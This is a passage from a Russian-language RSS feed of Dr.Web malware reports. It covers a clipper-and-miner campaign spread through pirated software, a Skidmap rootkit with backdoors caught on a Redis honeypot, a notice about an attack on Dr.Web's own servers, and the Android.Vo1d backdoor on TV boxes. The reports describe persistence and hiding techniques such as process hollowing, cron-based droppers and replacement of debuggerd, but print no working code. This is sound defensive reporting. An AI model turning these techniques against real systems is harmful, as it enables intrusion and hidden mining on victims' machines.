  &lt;Li&gt;Отключает службу восстановления ОС Windows&lt;/Li&gt;
  &lt;Li&gt;Отправляет в Telegram злоумышленникам информацию о технических характеристиках зараженного компьютера, его имя, версию ОС и сведения об установленном антивирусном ПО.&lt;/Li&gt;
&lt;/ol&gt;

&lt;p&gt;Функции скрытого майнинга и кражи криптовалюты выполняют файлы &lt;span class="string"&gt;DeviceId.dll&lt;/span&gt; и &lt;span class="string"&gt;7zxa.dll&lt;/span&gt;. Оба файла встраиваются в процесс &lt;span class="string"&gt;explorer.exe&lt;/span&gt; (Проводник ОС Windows), используя технику Process Hollowing. Первый файл представляет собой легитимную библиотеку, распространяемую в составе среды разработки .NET, в которую был встроен вредоносный AutoIt скрипт, запускающий майнер &lt;a href="https://vms.drweb.kz/search/?q=SilentCryptoMiner&amp;lng=kk"&gt;&lt;b&gt;SilentCryptoMiner&lt;/b&gt;&lt;/a&gt;. Этот майнер обладает широкими возможностями по конфигурации и маскировке процесса добычи криптовалюты, а также функцией удаленного управления.&lt;/p&gt;

&lt;blockquote&gt;
  Библиотека &lt;span class="string"&gt;7zxa.dll&lt;/span&gt;, замаскированная под компонент архиватора 7-Zip, является так называемым клиппером. Данный тип вредоносного ПО используется для мониторинга данных в буфере обмена, которые он может или подменять, или пересылать злоумышленникам. В данном случае клиппер отслеживает появление в буфере обмена типовых последовательностей символов, характерных для адресов кошельков, и заменяет их на те, которые были указаны злоумышленниками. К моменту публикации достоверно известно, что только благодаря клипперу хакеры смогли обогатиться на более чем 6000 долларов (или 571 тысячу рублей).
&lt;/blockquote&gt;

&lt;p&gt;Техника Process Hollowing заключается в запуске какого-либо доверенного процесса в приостановленном состоянии, перезаписи его кода в памяти на вредоносный, а затем возобновлении выполнения процесса. Использование такой техники приводит к появлению одноименных копий процесса, так в нашем случае на компьютерах жертв наблюдалось три процесса &lt;span class="string"&gt;explorer.exe&lt;/span&gt;, что является подозрительным самим по себе, так как в норме этот процесс существует в единственном экземпляре.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/Attack_Chain_ru.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/Attack_Chain_ru.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt; 

&lt;p&gt;Всего от действий киберпреступников пострадало более 28 тысяч человек, превалирующее большинство из которых являются жителями России. Также, значимые цифры заражений наблюдаются в Беларуси, Узбекистане, Казахстане, Украине, Кыргызстане и Турции. Поскольку компрометация компьютеров жертв происходила при установке пиратских версий популярных программ, то основными рекомендациями по профилактике подобных инцидентов являются скачивание ПО из официальных источников, использование программ-аналогов с открытым исходным кодом, а также использование антивирусов. Пользователи продуктов Dr.Web надежно защищены от данной угрозы.&lt;/p&gt;

&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.AutoIt.1443&amp;lng=kk"&gt;&lt;b&gt;Trojan.AutoIt.1443&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Metack/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=14918&amp;lng=kk</guid><title>Приманка для злоумышленников: сервер с уязвимой версией базы данных Redis позволил выявить новую модификацию руткита для сокрытия процесса добычи криптовалюты</title><link>https://news.drweb.kz/show/?i=14918&amp;lng=kk&amp;c=23</link><pubDate>Thu, 03 Oct 2024 11:05:29 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;3 октября 2024 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Вирусные аналитики компании «Доктор Веб» выявили новую модификацию руткита, устанавливающую на скомпрометированные машины с ОС Linux троян-майнер Skidmap. Этот руткит выполнен в виде вредоносного модуля ядра, который скрывает деятельность майнера, подменяя информацию о загрузке процессора и сетевой активности. Данная атака является массовой и направлена преимущественно на корпоративный сектор — крупные серверы и облачные среды, — так как именно с подобными ресурсами эффективность майнинга будет максимальной.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Система управления базами данных Redis является одной из самых популярных в мире: серверы Redis используются такими крупными компаниями как Х (ранее Twitter), AirBnB, Amazon и др. Преимущества системы очевидны: максимальное быстродействие, минимальные требования к ресурсам, поддержка различных типов данных и языков программирования. Однако у данного продукта есть и минусы: поскольку изначальное применение Redis не предполагало его установку на сетевой периферии, в конфигурации по умолчанию поддерживаются только базовые функции обеспечения безопасности, а в версиях до 6.0 отсутствуют механизмы контроля доступа и шифрования. Кроме того, ежегодно в профильных СМИ появляются сообщения о выявлении в Redis уязвимостей. Например, в 2023 году их было зафиксировано 12, три из которых имели статус «Серьезные». Участившиеся сообщения о компрометации серверов с последующей установкой программ для майнинга заинтересовали специалистов вирусной лаборатории «Доктор Веб», у которых возникло желание непосредственно пронаблюдать за данной атакой. Для этого было принято решение запустить свой сервер Redis с отключенной защитой и ждать непрошеных гостей. В течение года ежемесячно на сервер предпринимались от 10 до 14 тысяч атак, а недавно на сервере было обнаружено присутствие вредоносного ПО Skidmap, на что и рассчитывали наши аналитики. Однако неожиданным стало то, что в этом случае киберпреступники воспользовались новым методом сокрытия активности майнера, а заодно установили сразу четыре бэкдора.&lt;/p&gt;

&lt;p&gt;Первые сообщения о трояне Skidmap появились в 2019 году. Данный троян-майнер имеет определенную специализацию и встречается в основном в корпоративных сетях, так как наибольшую отдачу от скрытного майнинга можно получить именно в enterprise-сегменте. Несмотря на то, что с момента появления трояна прошло уже пять лет, принцип его работы остается без изменений: он устанавливается в систему посредством эксплуатации уязвимостей или неправильных настроек ПО. В случае нашего сервера-приманки хакеры добавили в системный планировщик cron задачи, в рамках которых каждые 10 минут запускался скрипт, скачивающий дроппер &lt;a href="https://vms.drweb.kz/search/?q=Linux.MulDrop.142&amp;lng=kk"&gt;&lt;b&gt;Linux.MulDrop.142&lt;/b&gt;&lt;/a&gt; (или другую его модификацию — &lt;a href="https://vms.drweb.kz/search/?q=Linux.MulDrop.143&amp;lng=kk"&gt;&lt;b&gt;Linux.MulDrop.143&lt;/b&gt;&lt;/a&gt;). Данный исполняемый файл проверяет версию ядра ОС, отключает защитный модуль SELinux, а затем распаковывает в системе файлы руткита &lt;a href="https://vms.drweb.kz/search/?q=Linux.Rootkit.400&amp;lng=kk"&gt;&lt;b&gt;Linux.Rootkit.400&lt;/b&gt;&lt;/a&gt;, майнера &lt;a href="https://vms.drweb.kz/search/?q=Linux.BtcMine.815&amp;lng=kk"&gt;&lt;b&gt;Linux.BtcMine.815&lt;/b&gt;&lt;/a&gt;, а также бэкдоров &lt;a href="https://vms.drweb.kz/search/?q=Linux.BackDoor.Pam.8&amp;lng=kk"&gt;&lt;b&gt;Linux.BackDoor.Pam.8&lt;/b&gt;&lt;/a&gt;&lt;b&gt;/9&lt;/b&gt;, &lt;a href="https://vms.drweb.kz/search/?q=Linux.BackDoor.SSH.425&amp;lng=kk"&gt;&lt;b&gt;Linux.BackDoor.SSH.425&lt;/b&gt;&lt;/a&gt;&lt;b&gt;/426&lt;/b&gt; и трояна &lt;a href="https://vms.drweb.kz/search/?q=Linux.BackDoor.RCTL.2&amp;lng=kk"&gt;&lt;b&gt;Linux.BackDoor.RCTL.2&lt;/b&gt;&lt;/a&gt; для удаленного доступа. Отличительной чертой дроппера является то, что он имеет довольно большой размер, так как содержит исполняемые файлы под различные дистрибутивы Linux. В данном случае в тело дроппера были вшито примерно 60 файлов для разных версий дистрибутивов Debian и Red Hat Enterprise Linux, которые наиболее часто устанавливаются на серверы.&lt;/p&gt;

&lt;p&gt;После установки руткит перехватывает ряд системных вызовов, что позволяет ему выдавать фейковые сведения в ответ на диагностические команды, вводимые администратором. Среди перехватываемых функций встречаются те, которые сообщают о среднем значении загрузки ЦП, сетевой активности на ряде портов и выводят перечень файлов в папках. Руткит также проверяет все загружаемые модули ядра и запрещает запуск тех, которые могут детектировать его присутствие. Всё это позволяет полностью скрывать все аспекты деятельности майнера по добыче криптовалюты: вычисления, отправку хешей и получение заданий.&lt;/p&gt;

&lt;p&gt;Назначение устанавливаемых дроппером бэкдоров в рамках этой атаки заключается в сохранении и отправке злоумышленникам данных обо всех SSH-авторизациях, а также создании мастер-пароля ко всем учетным записям в системе. Отметим, что все пароли при отправке дополнительно шифруются шифром Цезаря со смещением в 4 буквы.&lt;/p&gt;

&lt;p&gt;Для расширения возможностей по контролю взломанной системы злоумышленники устанавливают RAT-троян &lt;a href="https://vms.drweb.kz/search/?q=Linux.BackDoor.RCTL.2&amp;lng=kk"&gt;&lt;b&gt;Linux.BackDoor.RCTL.2&lt;/b&gt;&lt;/a&gt;. Он позволяет отправлять команды на скомпрометированный сервер и получать от него любые данные по зашифрованному соединению, которое троян инициирует самостоятельно.&lt;/p&gt;

&lt;p&gt;В качестве майнера устанавливается программа xmrig, позволяющая добывать ряд криптовалют, наиболее известной из которых является Monero, снискавшая популярность в даркнете благодаря своей полной анонимности на уровне транзакций. Следует сказать, что обнаружение прикрытого руткитом майнера в кластере серверов является довольно нетривиальной задачей. В отсутствие достоверных сведений о потреблении ресурсов, единственное, что может натолкнуть на мысль о компрометации — это избыточное энергопотребление и повышенное теплообразование. Злоумышленники также могут изменять настройки майнера таким образом, чтобы обеспечить оптимальный баланс между производительностью майнинга и сохранением быстродействия оборудования, что позволит привлекать меньше внимания к скомпрометированной системе.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/Artboard_ru.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/Artboard_ru.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;Эволюция семейства вредоносного ПО Skidmap проявляется в усложнении схемы атаки: запускаемые программы делают вызовы друг к другу, отключают защитные системы, вмешиваются в работу большого числа системных утилит и служб, загружают руткиты и т. д., что значительно затрудняет действия по реагированию на подобные инциденты.&lt;/p&gt;

&lt;p&gt;Перечисленные угрозы внесены в вирусную базу Dr.Web и потому не представляют опасности для пользователей наших продуктов.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/skidmap" target="_blank" rel="noopener noreferrer"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Linux.MulDrop.142&amp;lng=kk"&gt;&lt;b&gt;Linux.MulDrop.142&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Linux.MulDrop.143&amp;lng=kk"&gt;&lt;b&gt;Linux.MulDrop.143&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Linux.MulDrop.144&amp;lng=kk"&gt;&lt;b&gt;Linux.MulDrop.144&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Linux.Rootkit.400&amp;lng=kk"&gt;&lt;b&gt;Linux.Rootkit.400&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=14907&amp;lng=kk</guid><title>Атака на ресурсы «Доктор Веб» отражена. Обновление вирусных баз возобновлено </title><link>https://news.drweb.kz/show/?i=14907&amp;lng=kk&amp;c=23</link><pubDate>Wed, 18 Sep 2024 15:28:43 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;18 сентября 2024 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Ситуация с атакой на ресурсы "Доктор Веб" успешно разрешена, и мы делимся оперативными новостями и хронологией событий.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Атака на наши ресурсы началась в субботу &lt;b&gt;14 сентября 2024 года&lt;/b&gt;. Мы внимательно за ней наблюдали и держали происходящее под контролем.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;16 сентября 2024 года&lt;/b&gt; наша компания зафиксировала признаки внешнего неправомерного воздействия на IT-инфраструктуру.&lt;/p&gt;
&lt;p&gt;Согласно действующим протоколам безопасности мы оперативно отключили серверы и запустили процесс всесторонней диагностики. Для анализа и устранения последствий инцидента был использован комплекс мер, включавший использование сервиса Dr.Web FixIt! для Linux. На основании полученных данных мы успешно локализовали угрозу и убедились, что она не затронула клиентов компании.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;16 сентября, 09:30.&lt;/b&gt; В рамках соблюдения протоколов безопасности часть ресурсов компании временно отключена от сети для проведения дополнительной проверки. В связи с этим приостановлен выпуск обновлений вирусных баз Dr.Web.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;17 сентября, 16:20.&lt;/b&gt; Обновление вирусных баз Dr.Web возобновлено в полном объеме. Никто из пользователей Dr.Web не пострадал.&lt;/p&gt;
&lt;br/&gt;
&lt;p&gt;Мы продолжаем следовать самым высоким стандартам безопасности и оперативно принимаем меры для восстановления стабильной работы всех систем.&lt;/p&gt;
</description></item><item><guid>https://news.drweb.kz/show/?i=14900&amp;lng=kk</guid><title>Пустота захватила более миллиона ТВ-приставок на Android</title><link>https://news.drweb.kz/show/?i=14900&amp;lng=kk&amp;c=23</link><pubDate>Thu, 12 Sep 2024 13:35:09 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;12 сентября 2024 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Специалисты «Доктор Веб» выявили новый случай инфицирования ТВ-приставок на базе Android. Вредоносная программа, получившая имя &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, заразила почти 1 300 000 устройств у пользователей из 197 стран. Это бэкдор, который помещает свои компоненты в системную область и по команде злоумышленников способен скрытно загружать и устанавливать стороннее ПО.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;В августе 2024 года в компанию «Доктор Веб» обратилось несколько пользователей, на чьих устройствах антивирус Dr.Web зафиксировал изменения в системной файловой области. Это произошло со следующими моделями:&lt;/p&gt;

&lt;table class="Table"&gt;
    &lt;thead&gt;
      &lt;tr&gt;
        &lt;th&gt;Модель ТВ-приставки&lt;/th&gt;
        &lt;th&gt;Заявленная версия прошивки&lt;/th&gt;
      &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
      &lt;tr&gt;
        &lt;td&gt;R4&lt;/td&gt;
        &lt;td&gt;Android 7.1.2; R4 Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;TV BOX&lt;/td&gt;
        &lt;td&gt;Android 12.1; TV BOX Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;KJ-SMART4KVIP&lt;/td&gt;
        &lt;td&gt;Android 10.1; KJ-SMART4KVIP Build/NHG47K&lt;/td&gt;
      &lt;/tr&gt;
    &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;Во всех случаях признаки заражения оказались схожими, поэтому они будут описаны на примере одного из первых обращений. На затронутой трояном ТВ-приставке были изменены следующие объекты:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;install-recovery.sh&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;daemonsu&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Кроме того, в ее файловой системе появилось 4 новых файла:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/xbin/vo1d&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/xbin/wd&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/bin/debuggerd&lt;/span&gt;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;/system/bin/debuggerd_real&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Файлы &lt;span class="string"&gt;vo1d&lt;/span&gt; и &lt;span class="string"&gt;wd&lt;/span&gt; — компоненты выявленного нами трояна &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;blockquote&gt;
  Авторы трояна, вероятно, пытались замаскировать один из его компонентов под системную программу /system/bin/vold, назвав его схожим именем «vo1d» (подменив строчную букву «l» цифрой «1»). По имени этого файла вредоносная программа и получила свое наименование. При этом такое написание созвучно со словом «void» (в переводе с английского — пустота).
&lt;/blockquote&gt;

&lt;p&gt;Файл &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; — это скрипт, который присутствует на большинстве Android-устройств. Он запускается при старте операционной системы и содержит данные для автозапуска указанных в нем элементов. Если у какой-либо вредоносной программы есть root-доступ и возможность записи в системный каталог &lt;span class="string"&gt;/system&lt;/span&gt;, она может закрепиться на инфицированном устройстве, добавив себя в этот скрипт (либо создав его в случае отсутствия в системе). &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; прописал в нем автозапуск компонента &lt;span class="string"&gt;wd&lt;/span&gt;.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/01_recovery.png" class="preview alignCenter"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/01_recovery.png" alt="Модифицированный файл install-recovery.sh"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Модифицированный файл install-recovery.sh&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Файл &lt;span class="string"&gt;daemonsu&lt;/span&gt; присутствует на многих Android-устройствах с root-доступом. Он запускается системой при загрузке и отвечает за предоставление root-привилегий пользователю. &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; прописал себя и в этом файле, также настроив автозапуск модуля &lt;span class="string"&gt;wd&lt;/span&gt;. &lt;/p&gt;

&lt;p&gt;Файл &lt;span class="string"&gt;debuggerd&lt;/span&gt; является демоном, который обычно применяется для создания отчетов об ошибках. Но при заражении ТВ-приставки этот файл был подменен скриптом, запускающим компонент &lt;span class="string"&gt;wd&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Файл &lt;span class="string"&gt;debuggerd_real&lt;/span&gt; в рассматриваемом случае является копией скрипта, которым был подменен настоящий файл &lt;span class="string"&gt;debuggerd&lt;/span&gt;. Специалисты «Доктор Веб» полагают, что по задумке авторов трояна исходный &lt;span class="string"&gt;debuggerd&lt;/span&gt; должен был быть перемещен в &lt;span class="string"&gt;debuggerd_real&lt;/span&gt; для сохранения его работоспособности. Однако из-за того, что заражение, вероятно, произошло дважды, троян переместил уже подмененный файл (то есть скрипт). В результате на устройстве оказалось два скрипта от трояна и ни одного настоящего файла программы &lt;span class="string"&gt;debuggerd&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;В то же время у других обратившихся к нам пользователей на зараженных устройствах был несколько иной список файлов:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;daemonsu&lt;/span&gt; (аналог файла &lt;span class="string"&gt;vo1d&lt;/span&gt; — &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.1&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;wd&lt;/span&gt; (&lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.3&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;debuggerd&lt;/span&gt; (аналогичен описанному выше скрипту);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;debuggerd_real&lt;/span&gt; (оригинальный файл утилиты &lt;span class="string"&gt;debuggerd&lt;/span&gt;);&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; (скрипт, обеспечивающий загрузку указанных в нем объектов).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Изучение всех этих файлов показало, что для закрепления &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; в системе его создатели использовали как минимум три различных метода — модификацию файлов &lt;span class="string"&gt;install-recovery.sh&lt;/span&gt; и &lt;span class="string"&gt;daemonsu&lt;/span&gt;, а также подмену программы  &lt;span class="string"&gt;debuggerd&lt;/span&gt;. Вероятно, они рассчитывали, что в инфицируемой системе будет присутствовать хотя бы один из целевых файлов, поскольку манипуляция даже с одним из них обеспечила бы успешный автозапуск трояна при последующих перезагрузках устройства.&lt;/p&gt;

&lt;p&gt;Основная функциональность &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; скрыта в его компонентах &lt;span class="string"&gt;vo1d&lt;/span&gt; (&lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.1&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;) и &lt;span class="string"&gt;wd&lt;/span&gt; (&lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.3&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;), которые работают в связке. Модуль &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.1&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt; отвечает за запуск &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.3&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt; и контролирует его активность, при необходимости перезапуская процесс. Также по команде управляющего сервера он может скачивать и запускать исполняемые файлы. В свою очередь, модуль &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.3&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt; устанавливает на устройство и запускает зашифрованный в его теле демон (&lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.5&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.5&lt;/b&gt;&lt;/a&gt;), который тоже способен скачивать и запускать исполняемые файлы. Кроме того, он отслеживает появление APK-файлов приложений в заданных каталогах и устанавливает их.&lt;/p&gt;

&lt;p&gt;Проведенное вирусными аналитиками «Доктор Веб» исследование показало, что бэкдор &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; заразил около 1 300 000 устройств, а география его распространения охватила почти 200 стран. Больше всего заражений было выявлено в Бразилии, Марокко, Пакистане, Саудовской Аравии, России, Аргентине, Эквадоре, Тунисе, Малайзии, Алжире и Индонезии.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_ru.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_ru.png" alt="Страны с наибольшим числом выявленных зараженных устройств" style="width:75%;"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Страны с наибольшим числом выявленных зараженных устройств&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Возможной причиной того, что распространяющие &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; злоумышленники выбрали своей целью именно ТВ-приставки, является то, что такие устройства часто работают на базе устаревших версий Android, в которых не закрыты уязвимости и для которых уже не выходят обновления. Например, модели у обратившихся к нам пользователей работают на базе Android 7.1 несмотря на то, что для некоторых из них в конфигурации указаны версии намного новее — Android 10 и Android 12. К сожалению, это нередкая практика, когда производители бюджетных устройств используют старые версии ОС и выдают их за более актуальные, чтобы повысить их привлекательность.&lt;/p&gt;

&lt;p&gt;Кроме того, сами пользователи ошибочно могут воспринимать ТВ-приставки как более защищенные устройства по сравнению со смартфонами. Из-за этого они могут реже устанавливать на них антивирус и рискуют столкнуться с вредоносными программами при скачивании сторонних приложений или при установке неофициальных прошивок.&lt;/p&gt;

&lt;p&gt;На данный момент источник заражения приставок бэкдором остается неизвестным. Одним из возможных векторов может рассматриваться атака промежуточной вредоносной программы, которая эксплуатирует уязвимости операционной системы для получения root-полномочий. Другим может быть использование неофициальных версий прошивок с root-доступом.&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space для мобильных устройств успешно детектирует все известные варианты трояна &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; и при наличии root-доступа выполняет лечение зараженных гаджетов.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Vo1d/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее об &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.1&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее об &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.3&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее об &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d.5&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d.5&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=14899&amp;lng=kk</guid><title>Использование Яндекс Браузера для закрепления в скомпрометированной системе. Несостоявшаяся целевая атака на российского оператора грузовых железнодорожных перевозок.</title><link>https://news.drweb.kz/show/?i=14899&amp;lng=kk&amp;c=23</link><pubDate>Wed, 04 Sep 2024 10:21:45 GMT</pubDate><description>&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/Study_of_a_targeted_attack_on_a_Russian_rail_freight_operator_ru.pdf" class="Btn bg_main_green_5 widthCaptcha"&gt;
    &lt;span class="Btn-body icon icon_right" data-icon="#common-arrowRight"&gt;
      &lt;span class="Btn-text"&gt;Скачать в PDF&lt;/span&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;&lt;b&gt;4 сентября 2024 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Социальная инженерия — крайне эффективный метод мошенничества, которому сложно противостоять. Опытный злоумышленник умеет найти правильный подход к жертве, запугать или убедить ее выполнить какое-то действие. Но что если для реализации атаки не требуется каких-либо значимых коммуникативных усилий, а компьютер из цифрового помощника превращается в невольного соучастника преступления?&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Целевой фишинг — популярный метод доставки вредоносного ПО на компьютеры сотрудников крупных компаний. От обычного фишинга он отличается тем, что злоумышленники заранее собирают информацию и персонализируют свое сообщение, побуждая жертву выполнить какое-то действие, которое приведёт к компрометации. Основными целями преступники выбирают или высокопоставленных сотрудников, обладающих доступом к ценной информации, или сотрудников тех отделов, которые по долгу службы контактируют с множеством адресатов. В частности это касается работников отдела кадров: они получают массу писем от ранее незнакомых лиц с вложениями в самых разных форматах. Такой вектор атаки и был избран мошенниками в том случае, о котором мы сейчас вам расскажем.&lt;/p&gt;

&lt;p&gt;В марте 2024 года в компанию «Доктор Веб» обратились представители крупного российского предприятия, работающего в отрасли грузовых железнодорожных перевозок. Внимание сотрудников отдела информационной безопасности привлекло подозрительное письмо с прикрепленным к нему вложением. После попытки самостоятельно определить, какую опасность несет приложенный файл, они обратились к нашим специалистам. Ознакомившись с полученным запросом, наши аналитики пришли к выводу, что компания чуть не стала жертвой целевой атаки. Задачами, которые ставили перед собой злоумышленники, был сбор информации о системе и запуск модульного вредоносного ПО на скомпрометированном ПК.&lt;/p&gt;

